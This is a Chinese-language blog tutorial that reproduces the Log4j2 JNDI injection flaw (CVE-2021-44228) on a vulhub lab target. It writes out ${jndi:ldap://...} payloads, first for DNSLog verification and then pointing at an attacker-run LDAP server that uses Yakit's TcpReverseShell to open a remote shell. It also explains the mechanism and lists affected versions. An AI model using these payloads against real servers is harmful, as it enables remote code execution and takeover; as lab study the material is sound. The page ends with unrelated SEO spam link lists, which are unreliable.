当前位置: 首页 > news >正文

手机单页网站制作网站商城建设哪家好

手机单页网站制作,网站商城建设哪家好,个人建网站需要什么手续,kindeditor代码高亮 wordpress一,靶场搭建 在家庭局域网的另一条Ubuntu24笔记本中,使用vulhub靶场搭建,首先下载vulhub,解压并进入目录/vulhub/log4j/CVE-2021-44228中,执行docker启动命令 docker compose up -d 宝塔查看靶场信息 接下来我们直接…

一,靶场搭建

在家庭局域网的另一条Ubuntu24笔记本中,使用vulhub靶场搭建,首先下载vulhub,解压并进入目录/vulhub/log4j/CVE-2021-44228中,执行docker启动命令

docker compose up -d

宝塔查看靶场信息

在这里插入图片描述

接下来我们直接访问靶机ip的 8993 端口即可看到靶场

在这里插入图片描述

二,漏洞验证

首先使用 Yakit的DNSLog 平台获取一个子域名

这里获取到的子域名为:ykbdqepxgy.dgrh3.cn

在这里插入图片描述

使用该子域名,我们构造 payload:

${jndi:ldap://ykbdqepxgy.dgrh3.cn}

在目标网站,找到注入点

在这里插入图片描述

点击Add Core后,Logging会增加error日志,从而触发漏洞。

DNSLog出现反连,漏洞验证成功,这里存在log4j2 远程代码执行漏洞

在这里插入图片描述

三,漏洞利用

在Yakit中,开启端口监听器,输入本机IP,和监听端口,这里设为4445,点击启动监听

在这里插入图片描述

便于后续连接反射shell

再打开一个反连服务器,设置本机IP,默认端口即可,设置payload,为恶意类,TcpReverseShell,反连主机和反连端口和刚才设置的监听器,保持一致。

在这里插入图片描述

复制上面的 ldap://192.168.0.104:4444/TqduOHDq构造新的payload

${jndi:ldap://192.168.0.104:4444/TqduOHDq}

返回网站的注入点,重复验证的步骤,注入payload

在这里插入图片描述

提交后,点击左侧的Logging显示报错日志,注入成功

在这里插入图片描述

返回Yakit的反连服务器,可以观察到反连信息

在这里插入图片描述

返回端口监听器,连接成功

在这里插入图片描述

这里注意要把 原始模式 取消,不然传入的命令无法正常执行,可能是一个小BUG,执行ls命令成功

在这里插入图片描述

漏洞复现成功

四,原理分析

这个漏洞的核心是Java Naming and Directory Interface(JNDI)注入攻击,Log4j2在处理日志消息时,会自动解析其中的特定格式字符串,包括${}中的表达式。例如,${env:VAR}可以用来输出环境变量VAR的值。这种功能本身是为了方便开发人员获取动态内容。

然而,Log4j2也支持通过JNDI从远程服务器获取数据。这意味着,如果日志消息中包含类似${jndi:ldap://example.com/a}的字符串,Log4j2会尝试通过JNDI从ldap://example.com/a获取数据。

由于JNDI查找可以通过多种协议(如LDAP、RMI、DNS等)访问远程服务器,这个漏洞允许攻击者通过在日志消息中嵌入恶意的JNDI查找字符串,远程执行任意代码(RCE),从而完全控制受影响的系统。

从网上找了个图

五,影响版本

受影响版本范围:2.0 ≤ Apache Log4j2 < 2.15.0-rc2

此外对于java版本的要求

在这里插入图片描述

如果想要自己在本地通过java代码复现漏洞一定要注意java版本,在这里踩了几天的坑。

http://www.yayakq.cn/news/52841/

相关文章:

  • 网站的发展历史云南网站建设c3sales
  • 做电影下载网站需要什么图表设计网站
  • 有项目没有钱怎么找投资人网站很卡如何优化
  • 自媒体运营小程序开发网站建设怎么申请域名注册商
  • 创造与魔法官方网站做自己优秀文创产品设计案例
  • 长沙企业建站销售电话青州网站设计
  • 建设网站后台网站可以做网站广告
  • ui做的好的网站长沙公司网页设计
  • php门户网站模板下载图片制作二维码
  • 梁平区高点击量网站建设哪家好怎么设置网站字体
  • 国外不织布网站做的教具网站建设都包含哪些内容
  • 家装企业网站系统下载网站 文件夹结构
  • 网站管理维护怎么做西安网站建设定
  • 企业网站包含哪些页面h5做商城网站
  • 网站套餐网页一个网站的建设流程图
  • 网站免费观影怎么做在线企业建站模板
  • 导购网站一站式建站网络营销公司起名
  • 镇江网站建设介绍铁岭做网站信息
  • 做海报找素材网站惠州抖音seo策划
  • 付运费送东西的网站怎么做关键词 网站
  • 公司网站建设意见织梦手机网站
  • wordpress 不同页面seo网站收录工具
  • 哪家广告平面设计学校好潍坊seo培训
  • 怎么做好网站营销推广网站开发现在主要用什么语言
  • 分类网站 制作开源网站程序
  • 深圳公司网站制作网站免费正能量软件不良
  • 石家庄模板建站平台js 曲线 网站
  • apache添加多个网站大前端dux主题wordpress
  • 泸州市住房和城乡建设网站怎么做网站编程
  • 手机端网站动效类怎么做百度做网站的